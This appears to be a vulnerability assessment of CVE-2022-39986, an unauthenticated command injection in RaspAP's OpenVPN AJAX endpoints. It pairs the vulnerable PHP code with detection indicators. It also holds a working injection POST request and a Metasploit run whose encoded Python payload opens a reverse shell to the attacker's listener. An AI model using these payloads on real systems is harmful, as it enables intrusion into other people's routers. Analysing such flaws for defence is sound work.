Low
CVE-2022-39986
CVE-2022-39986
Description
A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
Add Assessment
Technical Analysis
This is an unauthenticated command injection vulnerability in RaspAP, a wireless route software that runs on Debian-based devices. The vulnerable raspap-webgui application shouldn’t be configured to be internet facing which and is reflected in this assessment’s Attacker Value. Most endpoints on the application require a valid CSRF token to be accessed except for some, which include:
/ajax/openvpn/activate_ovpncfg.php
/ajax/openvpn/del_ovpncfg.php
These two endpoints accept a POST parameter cfg_id which gets run directly in a php exec() command without being sanitized. The vulnerable code can be seen below, or in full on the RaspAP raspap-webgui github
<?php require_once '../../includes/config.php'; require_once '../../includes/functions.php'; if (isset($_POST['cfg_id'])) { $ovpncfg_id = $_POST['cfg_id']; $ovpncfg_client = RASPI_OPENVPN_CLIENT_PATH.$ovpncfg_id.'_client.conf'; $ovpncfg_login = RASPI_OPENVPN_CLIENT_PATH.$ovpncfg_id.'_login.conf'; // remove existing client config +login and symbolically link the selected one system("sudo rm ".RASPI_OPENVPN_CLIENT_CONFIG, $return); system("sudo ln -s $ovpncfg_client ".RASPI_OPENVPN_CLIENT_CONFIG, $return);
This vulnerability can be exploited with a simple POST request in order to inject the following command: touch /tmp/pwned
POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1 Host: 172.16.199.130 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0 Content-Type: application/x-www-form-urlencoded Content-Length: 642 cfg_id%3D%3Btouch%20%2Ftmp%2Fpwned%3B%23
Or if getting a shell is more your thing use the new Metasploit module to obtain a meterpreter session:
msf6 > use exploit/unix/http/raspap_rce [*] Using configured payload cmd/unix/reverse_bash msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130 rhosts => 172.16.199.130 msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(unix/http/raspap_rce) > run [*] Started reverse TCP handler on 172.16.199.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) - [*] Sending stage (24772 bytes) to 172.16.199.130 [*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400 meterpreter > getuid Server username: www-data meterpreter > sysinfo Computer : debian OS : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27) Architecture : x64 Meterpreter : python/linux meterpreter >
IOCs
Since this is exploiting a parameter in a POST request, you won’t see the payload in the logs. It might be worth searching for suspicious processes spawned by the user running the RaspAP application. The user www-data is running the RaspAP application in this case and after running the Metasploit module, due to the python payload selected by default, there is a suspicious/usr/bin/python3 command running in the context of the user www-data.
Before
msfuser@debian:~$ ps aux | grep www-data www-data 866 0.0 0.1 5568 3804 ? Ss 20:00 0:00 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf www-data 879 0.0 1.0 201008 21552 ? Ss 20:00 0:00 /usr/bin/php-cgi www-data 925 0.0 0.3 201008 5976 ? S 20:00 0:00 /usr/bin/php-cgi www-data 928 0.0 0.3 201008 5976 ? S 20:00 0:00 /usr/bin/php-cgi www-data 929 0.0 0.3 201008 5976 ? S 20:00 0:00 /usr/bin/php-cgi www-data 930 0.0 0.3 201008 5976 ? S 20:00 0:00 /usr/bin/php-cgi msfuser 2786 0.0 0.1 6332 2012 pts/0 S+ 20:03 0:00 grep www-data
After
msfuser@debian:~$ ps aux | grep www-data www-data 866 0.0 0.1 5568 3804 ? Ss 20:00 0:00 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf www-data 879 0.0 1.0 201008 21552 ? Ss 20:00 0:00 /usr/bin/php-cgi www-data 925 0.0 0.3 201008 5976 ? S 20:00 0:00 /usr/bin/php-cgi www-data 928 0.0 0.6 201008 12404 ? S 20:00 0:00 /usr/bin/php-cgi www-data 929 0.0 0.5 201008 11468 ? S 20:00 0:00 /usr/bin/php-cgi www-data 930 0.0 0.3 201008 5976 ? S 20:00 0:00 /usr/bin/php-cgi www-data 2839 0.0 0.0 0 0 ? Z 20:07 0:00 [sh] <defunct> www-data 2846 1.3 1.5 43792 30976 ? Ss 20:07 0:00 /usr/bin/python3 - msfuser 2853 0.0 0.1 6332 2060 pts/0 S+ 20:08 0:00 grep www-data
Notes
The initial PoC write up mentioned in the references below indicates the command injection will result in execution in the context of the root user. This is incorrect and depends on how the RaspAP application has been deployed.
References
https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
https://github.com/rapid7/metasploit-framework/pull/18263
CVSS V3 Severity and Metrics
General Information
Vendors
- raspap
Products
- raspap
Metasploit Modules
References
